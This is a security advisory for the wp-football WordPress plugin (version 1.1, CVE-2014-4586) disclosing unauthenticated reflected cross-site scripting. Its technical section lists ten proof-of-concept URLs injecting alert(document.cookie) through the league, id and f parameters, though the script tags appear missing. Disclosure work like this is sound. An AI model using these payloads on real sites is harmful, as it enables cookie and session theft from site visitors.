Wp Plugin Wp Football

Plugin Details

Plugin Name: wp-plugin : wp-football
Effected Version : 1.1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2014-4586
Identified by : Anantshri
WPScan Reference URL

Disclosure Timeline

Technical Details

http://localhost/wp-content/plugins/wp-football/football_classification.php?league=league">alert(document.cookie)&group=group

http://localhost/wp-content/plugins/wp-football/football_criteria.php?league=league'>alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/football-functions.php?ajax=1&id_group=id_group&id_league=id_league&f=f'>alert(document.cookie)&id_phase=id_phase

http://localhost/wp-content/plugins/wp-football/football_groups_list.php?action=action&paged=paged&id=id">alert(document.cookie)&byajax=byajax

http://localhost/wp-content/plugins/wp-football/football_matches_list.php?action=action&paged=paged&id=id">alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/football_matches_load.php?action=delete&paged=paged&id_group=id_group&id_league=id_league">alert(document.cookie)&id_phase=id

http://localhost/wp-content/plugins/wp-football/football_matches_phase.php?action=action&paged=paged&id=id">alert(document.cookie)&id_phase=id_phase

http://localhost/wp-content/plugins/wp-football/football_phases_list.php?action=action&paged=paged&id=id">alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/templates/template_default_preview.php?league=league">alert(document.cookie)&

http://localhost/wp-content/plugins/wp-football/templates/template_worldCup_preview.php?league=league">alert(document.cookie)&

 

Vulnerable Parameters : league, id, f